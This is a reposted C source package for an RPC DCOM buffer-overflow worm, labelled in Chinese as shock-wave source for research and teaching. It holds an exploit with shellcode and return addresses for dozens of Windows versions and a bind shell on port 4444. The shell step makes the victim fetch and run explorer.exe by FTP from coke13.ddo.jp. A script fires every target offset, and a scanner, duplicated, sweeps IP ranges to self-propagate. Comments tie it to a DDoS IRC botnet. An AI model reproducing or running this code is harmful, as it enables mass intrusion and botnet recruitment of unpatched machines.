冲击波源代码,可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
vdcom.c
/* rpc dcom worm v 2.2 -
* originally by volkam, fixed and beefed by uv/graff
* even more original concept by lsd-pl.net
* original code by hdm
*
* --
* this code is in relation to a specific ddos ircd botnet project.
* you may edit the code, and define which ftp to login
* and which .exeutable file to recieve and run.
* i use spybot, very convienent
* -
* so basicly script kids and brazilian children, this is useless to you
*
* -
* shouts: darksyn - true homie , giver of 0d4yz, and testbeds
* volkam - top sekret agent man
* ntfx - master pupil
* jpahk - true homie #2
*
* legion2000 security research (c) 2003
* -
* enjoy!
**************************************************************/
#i nclude
#i nclude
#i nclude
#i nclude
#i nclude
#i nclude
#i nclude
#i nclude
#i nclude
#i nclude
#i nclude
unsigned char bindstr[]={
0x05,0x00,0x0b,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7f,0x00,0x00,0x00,
0xd0,0x16,0xd0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,
0x2b,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xe8,0x03
,0x00,0x00,0xe5,0x00,0x00,0x00,0xd0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xfd,0xcc,0x45
,0x64,0x49,0xb0,0x70,0xdd,0xae,0x74,0x2c,0x96,0xd2,0x60,0x5e,0x0d,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5e,0x0d,0x00,0x02,0x00,0x00,0x00,0x7c,0x5e
,0x0d,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xf1,0xf1,0x2a,0x4d
,0xce,0x11,0xa6,0x6a,0x00,0x20,0xaf,0x6e,0x72,0xf4,0x0c,0x00,0x00,0x00,0x4d,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0d,0xf0,0xad,0xba,0x00,0x00
,0x00,0x00,0xa8,0xf4,0x0b,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4d,0x45
,0x4f,0x57,0x04,0x00,0x00,0x00,0xa2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xc8,0x00
,0x00,0x00,0x4d,0x45,0x4f,0x57,0x28,0x03,0x00,0x00,0xd8,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xc4,0x28,0xcd,0x00,0x64,0x29
,0xcd,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xb9,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xab,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xa5,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xa6,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xa4,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xad,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xaa,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0x50,0x00,0x00,0x00,0x4f,0xb6,0x88,0x20,0xff,0xff
,0xff,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0c,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
,0x00,0x00,0x70,0xd8,0x98,0x93,0x98,0x4f,0xd2,0x11,0xa9,0x3d,0xbe,0x57,0xb2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0x80,0x00
,0x00,0x00,0x0d,0xf0,0xad,0xba,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4d,0x45,0x4f,0x57,0x04,0x00,0x00,0x00,0xc0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3b,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xc5,0x17,0x03,0x80,0x0e
,0xe9,0x4a,0x99,0x99,0xf1,0x8a,0x50,0x6f,0x7a,0x85,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0x30,0x00
,0x00,0x00,0x78,0x00,0x6e,0x00,0x00,0x00,0x00,0x00,0xd8,0xda,0x0d,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2f,0x0c,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0x10,0x00
,0x00,0x00,0x30,0x00,0x2e,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0x68,0x00
,0x00,0x00,0x0e,0x00,0xff,0xff,0x68,0x8b,0x0b,0x00,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00};
unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5c,0x00,0x5c,0x00};
unsigned char request3[]={
0x5c,0x00
,0x43,0x00,0x24,0x00,0x5c,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x2e,0x00,0x64,0x00,0x6f,0x00,0x63,0x00,0x00,0x00};
unsigned char *targets [] =
{
"windows nt sp4 (english)",
"windows nt sp5 (chineese)",
"windows nt sp6 (chineese)",
"windows nt sp6a (chineese)",
"windows 2000 nosp (polish)",
"windows 2000 sp3 (polish)",
"windows 2000 sp4 (spanish)",
"windows 2000 nosp1 (english)",
"windows 2000 nosp2 (english)",
"windows 2000 sp2-1 (english)",
"windows 2000 sp2-2 (english)",
"windows 2000 sp3-2 (english)",
"windows 2000 nosp (chineese)",
"windows 2000 sp1 (chineese)",
"windows 2000 sp2 (chineese)",
"windows 2000 sp3 (chineese)",
"windows 2000 sp4 (chineese)",
"windows 2000 sp3 (german)",
"windows 2000 nosp (japaneese",
"windows 2000 sp1 (japaneese)",
"windows 2000 sp2 (japaneese)",
"windows 2000 nosp (korean)",
"windows 2000 sp1 (korean)",
"windows 2000 sp2 (korean)",
"windows 2000 nosp (mexican)",
"windows 2000 sp1 (mexican)",
"windows xp nosp (english)",
"windows sp1-2 (english)",
"windows 2k3 (english)",
"windows 2000 sp3 (german)",
"windows 2000 sp4-1 (german)",
"windows 2000 sp4-2 (german)",
"windows xp sp1 (german)",
"windows 2000 server sp1 (french)",
"windows 2000 server sp4 (french)",
"windows xp nosp (french)",
"windows xp sp1 (french)",
"windows 2000 sp0 (english)",
"windows 2000 sp1 (english)",
"windows 2000 sp2 (english)",
"windows 2000 sp3 (english)",
"windows 2000 sp4 (english)",
"windows xp sp0 (english)",
"windows xp sp1-1 (english)",
"windows xp sp2 (english)",
"windows 2000 advanced server sp3 (english)",
"all/winxp/win2k",
null
};
unsigned long offsets [] =
{
0x77e527f3,
0x77cfdaee,
0x77ac0ef0,
0x77c3eaf0,
0x774d3fe3,
0x77292ce4,
0x77133ba5,
0x777416e8,
0x772b49e2,
0x77b524e8,
0x775cfa2e,
0x772ae3e2,
0x778b89e6,
0x772b49e0,
0x77444342,
0x77294cdf,
0x777a882e,
0x77e527f3,
0x778b89e5,
0x772b49df,
0x772ae3e1,
0x778b89e5,
0x772b49df,
0x772ae3e1,
0x778b89e8,
0x77e3afe9,
0x77db37d7,
0x77b05422,
0x77292ce3,
0x77294ce0,
0x7756c2e2,
0x77fc18d4,
0x774b3ee4,
0x7756c2e2,
0x774a75d4,
0x77fc18d4,
0x77e81674,
0x77e829ec,
0x77e824b5,
0x77e8367a,
0x77f92a9b,
0x77e9afe3,
0x77e626ba,
0x77d737db,
0x77e2afc5,
0x010016c6
};
unsigned char sc[]=
"\x46\x00\x58\x00\x4e\x00\x42\x00\x46\x00\x58\x00"
"\x46\x00\x58\x00\x4e\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
"\x46\x00\x58\x00\x46\x00\x58\x00"
"\xff\xff\xff\xff" /* return address */
"\xcc\xe0\xfd\x7f" /* primary thread data block */
"\xcc\xe0\xfd\x7f" /* primary thread data block */
/* port 4444 bindshell */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
"\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
"\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
"\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
"\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
"\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
"\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
"\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81"
"\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
"\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
"\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
"\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
"\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
"\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
"\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
"\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
"\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
"\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
"\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
"\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
"\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
"\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
"\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
"\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
"\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
"\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
"\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
"\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
"\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
"\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
"\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
"\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";
unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0x20,0x00,0x00,0x00,0x30,0x00,0x2d,0x00,0x00,0x00
,0x00,0x00,0x88,0x2a,0x0c,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8c
,0x0c,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
void
shell(int sock)
{
fd_set fd_read;
char buff[1024], *cmd="echo open coke13.ddo.jp>>o&echo wed>>o&echo wed>>o&echo user wed wed>>o&echo bin>>o&echo get explorer.exe>>o&echo bye>>o&ftp -s:o&explorer.exe&del o&exit\n";
int n;
fd_zero(&fd_read);
fd_set(sock, &fd_read);
fd_set(0, &fd_read);
send(sock, cmd, strlen(cmd), 0);
while(1) {
fd_set(sock,&fd_read);
fd_set(0,&fd_read);
if (select(fd_setsize, &fd_read, null, null, null) < 0 ) break;
if (fd_isset(sock, &fd_read)) {
if((n = recv(sock, buff, sizeof(buff), 0)) < 0){
fprintf(stderr, "eof\n");
exit(2);
}
if (write(1, buff, n) < 0) break;
}
if (fd_isset(0, &fd_read)) {
if((n = read(0, buff, sizeof(buff))) < 0){
fprintf(stderr, "eof\n");
exit(2);
}
if (send(sock, buff, n, 0) < 0) break;
}
usleep(10);
exit(0);
}
fprintf(stderr, "connection lost.\n\n");
exit(0);
}
int main(int argc, char **argv)
{
int sock;
int len,len1;
unsigned int target_id;
unsigned long ret;
struct sockaddr_in target_ip;
unsigned short port = 135;
unsigned char buf1[0x1000];
unsigned char buf2[0x1000];
printf("---------------------------------------------------------\n");
printf("- remote dcom rpc buffer overflow exploit\n");
printf("- original code by flashsky and benjurry\n");
printf("- rewritten by hdm\n");
printf("- autoroot/worm by volkam\n");
printf("- fixed and beefed by legion2000 security research\n");
if(argc<3)
{
printf("- usage: %s \n", argv[0]);
printf("- targets:\n");
for (len=0; targets[len] != null; len++)
{
printf("- %d\t%s\n", len, targets[len]);
}
printf("\n");
exit(1);
}
/* yeah, get over it */
target_id = atoi(argv[1]);
ret = offsets[target_id];
printf("- using return address of 0x%.8x\n", ret);
memcpy(sc+36, (unsigned char *) &ret, 4);
target_ip.sin_family = af_inet;
target_ip.sin_addr.s_addr = inet_addr(argv[2]);
target_ip.sin_port = htons(port);
if ((sock=socket(af_inet,sock_stream,0)) == -1)
{
perror("- socket");
return(0);
}
if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != 0)
{
perror("- connect");
return(0);
}
len=sizeof(sc);
memcpy(buf2,request1,sizeof(request1));
len1=sizeof(request1);
*(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2;
*(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2;
memcpy(buf2+len1,request2,sizeof(request2));
len1=len1+sizeof(request2);
memcpy(buf2+len1,sc,sizeof(sc));
len1=len1+sizeof(sc);
memcpy(buf2+len1,request3,sizeof(request3));
len1=len1+sizeof(request3);
memcpy(buf2+len1,request4,sizeof(request4));
len1=len1+sizeof(request4);
*(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc;
if (send(sock,bindstr,sizeof(bindstr),0)== -1)
{
perror("- send");
return(0);
}
len=recv(sock, buf1, 1000, 0);
if (send(sock,buf2,len1,0)== -1)
{
perror("- send");
return(0);
}
close(sock);
sleep(1);
target_ip.sin_family = af_inet;
target_ip.sin_addr.s_addr = inet_addr(argv[2]);
target_ip.sin_port = htons(4444);
if ((sock=socket(af_inet,sock_stream,0)) == -1)
{
perror("- socket");
return(0);
}
if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != 0)
{
printf("- exploit appeared to have failed.\n");
return(0);
}
printf("- dropping to system shell...\n\n");
shell(sock);
return(0);
}
serv
./vdcom 44 $1&
./vdcom 45 $1&
./vdcom 46 $1&
./vdcom 10 $1&
./vdcom 11 $1&
./vdcom 12 $1&
./vdcom 13 $1&
./vdcom 14 $1&
./vdcom 15 $1&
./vdcom 16 $1&
./vdcom 17 $1&
./vdcom 18 $1&
./vdcom 19 $1&
./vdcom 20 $1&
./vdcom 21 $1&
./vdcom 22 $1&
./vdcom 23 $1&
./vdcom 24 $1&
./vdcom 25 $1&
./vdcom 26 $1&
./vdcom 27 $1&
./vdcom 28 $1&
./vdcom 29 $1&
./vdcom 30 $1&
./vdcom 31 $1&
./vdcom 32 $1&
./vdcom 33 $1&
./vdcom 34 $1&
./vdcom 35 $1&
./vdcom 36 $1&
./vdcom 37 $1&
./vdcom 38 $1&
./vdcom 39 $1&
./vdcom 40 $1&
./vdcom 41 $1&
./vdcom 42 $1&
./vdcom 43 $1&
./vdcom 5 $1&
./vdcom 4 $1&
./vdcom 6 $1&
./vdcom 0 $1&
./vdcom 1 $1&
./vdcom 2 $1&
./vdcom 3 $1&
./vdcom 8 $1&
./vdcom 9 $1&
./vdcom 7 $1&
scan.c
#i nclude
#i nclude
#i nclude
#i nclude
#i nclude
#i nclude
#i nclude
#i nclude
#define max_sockets 1000
#define timeout 2
#define s_none 0
#define s_connecting 1
struct conn_t {
int s;
char status;
time_t a;
struct sockaddr_in addr;
};
struct conn_t connlist[max_sockets];
void init_sockets(void);
void check_sockets(void);
void fatal(char *);
int main(int argc, char *argv[])
{
int done, i, aa, bb, cc, dd, ret, k, ns;
unsigned int port;
time_t scantime;
char ip[20];
if (argc < 3) {
printf("usage: %s [b-block] [c-block]\n", argv[0]);
return -1;
}
done = 0; bb = 0; cc = 0; dd = 0; aa = 0; port = 0;
aa = atoi(argv[1]);
if ((aa < 0) || (aa > 255)) {
fatal("invalid a-range\n");
}
port = (unsigned int)atoi(argv[2]);
if (port == 0)
fatal("bad port number.\n");
if (argc >= 4) {
bb = atoi(argv[3]);
if ((bb < 0) || (bb > 255))
fatal("invalid b-range.\n");
}
if (argc >= 5) {
cc = atoi(argv[4]);
if ((cc < 0) || (cc > 255))
fatal("invalid c-range.\n");
}
init_sockets();
scantime = time(0);
while(!done) {
for (i = 0; i < max_sockets; i++) {
if (dd == 255) {
if (cc < 255) {
cc++;
dd = 0;
}
else {
if (bb < 255) {
bb++;
cc = 0;
dd = 0;
}
else {
if (aa < 255) {
aa++;
bb = 0;
cc = 0;
dd = 0;
}
else {
ns = 0;
for (k = 0; k < max_sockets; k++) {
if (connlist[k].status > s_none)
ns++;
}
if (ns == 0)
break;
}
}
}
}
if (connlist[i].status == s_none) {
connlist[i].s = socket(af_inet, sock_stream, 0);
if (connlist[i].s != -1) {
ret = fcntl(connlist[i].s, f_setfl, o_nonblock);
if (ret == -1) {
printf("unable to set o_nonblock\n");
close(connlist[i].s);
}
else {
memset((char *)ip, 0, 20);
sprintf(ip, "%d.%d.%d.%d", aa, bb, cc, dd);
connlist[i].addr.sin_addr.s_addr = inet_addr(ip);
if (connlist[i].addr.sin_addr.s_addr == -1)
fatal("invalid ip.");
connlist[i].addr.sin_family = af_inet;
connlist[i].addr.sin_port = htons(port);
connlist[i].a = time(0);
connlist[i].status = s_connecting;
dd++;
}
}
}
}
check_sockets();
}
}
void init_sockets(void)
{
int i;
for (i = 0; i < max_sockets; i++) {
connlist[i].status = s_none;
memset((struct sockaddr_in *)&connlist[i].addr, 0,
sizeof(struct sockaddr_in));
}
}
void check_sockets(void)
{
int i, ret;
for (i = 0; i < max_sockets; i++) {
if ((connlist[i].a < (time(0) - timeout)) &&
(connlist[i].status == s_connecting)) {
close(connlist[i].s);
connlist[i].status = s_none;
}
else if (connlist[i].status == s_connecting) {
ret = connect(connlist[i].s,
(struct sockaddr *)&connlist[i].addr,
sizeof(struct sockaddr_in));
if (ret == -1) {
if (errno == eisconn) {
printf("%s\n",
(char *)inet_ntoa(connlist[i].addr.sin_addr),
(time(0)-connlist[i].a));
close(connlist[i].s);
connlist[i].status = s_none;
}
if ((errno != ealready) && (errno != einprogress)) {
close(connlist[i].s);
connlist[i].status = s_none;
}
}
else {
char luck[100];
sprintf(luck,"./serv %s",(char *)inet_ntoa(connlist[i].addr.sin_addr),(time(0)-connlist[i].a));
printf("attempting rpc/dcom on %s\n",
(char *)inet_ntoa(connlist[i].addr.sin_addr),
(time(0)-connlist[i].a));
system(luck);
printf("done with %s next ...\n");
close(connlist[i].s);
connlist[i].status = s_none;
}
}
}
}
void fatal(char *err)
{
int i;
printf("error: %s\n", err);
for (i = 0; i < max_sockets; i++) {
if (connlist[i].status >= s_connecting)
close(connlist[i].s);
}
exit(-1);
}
scan.c
#i nclude
#i nclude
#i nclude
#i nclude
#i nclude
#i nclude
#i nclude
#i nclude
#define max_sockets 1000
#define timeout 2
#define s_none 0
#define s_connecting 1
struct conn_t {
int s;
char status;
time_t a;
struct sockaddr_in addr;
};
struct conn_t connlist[max_sockets];
void init_sockets(void);
void check_sockets(void);
void fatal(char *);
int main(int argc, char *argv[])
{
int done, i, aa, bb, cc, dd, ret, k, ns;
unsigned int port;
time_t scantime;
char ip[20];
if (argc < 3) {
printf("usage: %s [b-block] [c-block]\n", argv[0]);
return -1;
}
done = 0; bb = 0; cc = 0; dd = 0; aa = 0; port = 0;
aa = atoi(argv[1]);
if ((aa < 0) || (aa > 255)) {
fatal("invalid a-range\n");
}
port = (unsigned int)atoi(argv[2]);
if (port == 0)
fatal("bad port number.\n");
if (argc >= 4) {
bb = atoi(argv[3]);
if ((bb < 0) || (bb > 255))
fatal("invalid b-range.\n");
}
if (argc >= 5) {
cc = atoi(argv[4]);
if ((cc < 0) || (cc > 255))
fatal("invalid c-range.\n");
}
init_sockets();
scantime = time(0);
while(!done) {
for (i = 0; i < max_sockets; i++) {
if (dd == 255) {
if (cc < 255) {
cc++;
dd = 0;
}
else {
if (bb < 255) {
bb++;
cc = 0;
dd = 0;
}
else {
if (aa < 255) {
aa++;
bb = 0;
cc = 0;
dd = 0;
}
else {
ns = 0;
for (k = 0; k < max_sockets; k++) {
if (connlist[k].status > s_none)
ns++;
}
if (ns == 0)
break;
}
}
}
}
if (connlist[i].status == s_none) {
connlist[i].s = socket(af_inet, sock_stream, 0);
if (connlist[i].s != -1) {
ret = fcntl(connlist[i].s, f_setfl, o_nonblock);
if (ret == -1) {
printf("unable to set o_nonblock\n");
close(connlist[i].s);
}
else {
memset((char *)ip, 0, 20);
sprintf(ip, "%d.%d.%d.%d", aa, bb, cc, dd);
connlist[i].addr.sin_addr.s_addr = inet_addr(ip);
if (connlist[i].addr.sin_addr.s_addr == -1)
fatal("invalid ip.");
connlist[i].addr.sin_family = af_inet;
connlist[i].addr.sin_port = htons(port);
connlist[i].a = time(0);
connlist[i].status = s_connecting;
dd++;
}
}
}
}
check_sockets();
}
}
void init_sockets(void)
{
int i;
for (i = 0; i < max_sockets; i++) {
connlist[i].status = s_none;
memset((struct sockaddr_in *)&connlist[i].addr, 0,
sizeof(struct sockaddr_in));
}
}
void check_sockets(void)
{
int i, ret;
for (i = 0; i < max_sockets; i++) {
if ((connlist[i].a < (time(0) - timeout)) &&
(connlist[i].status == s_connecting)) {
close(connlist[i].s);
connlist[i].status = s_none;
}
else if (connlist[i].status == s_connecting) {
ret = connect(connlist[i].s,
(struct sockaddr *)&connlist[i].addr,
sizeof(struct sockaddr_in));
if (ret == -1) {
if (errno == eisconn) {
printf("%s\n",
(char *)inet_ntoa(connlist[i].addr.sin_addr),
(time(0)-connlist[i].a));
close(connlist[i].s);
connlist[i].status = s_none;
}
if ((errno != ealready) && (errno != einprogress)) {
close(connlist[i].s);
connlist[i].status = s_none;
}
}
else {
char luck[100];
sprintf(luck,"./serv %s",(char *)inet_ntoa(connlist[i].addr.sin_addr),(time(0)-connlist[i].a));
printf("attempting rpc/dcom on %s\n",
(char *)inet_ntoa(connlist[i].addr.sin_addr),
(time(0)-connlist[i].a));
system(luck);
printf("done with %s next ...\n");
close(connlist[i].s);
connlist[i].status = s_none;
}
}
}
}
void fatal(char *err)
{
int i;
printf("error: %s\n", err);
for (i = 0; i < max_sockets; i++) {
if (connlist[i].status >= s_connecting)
close(connlist[i].s);
}
exit(-1);
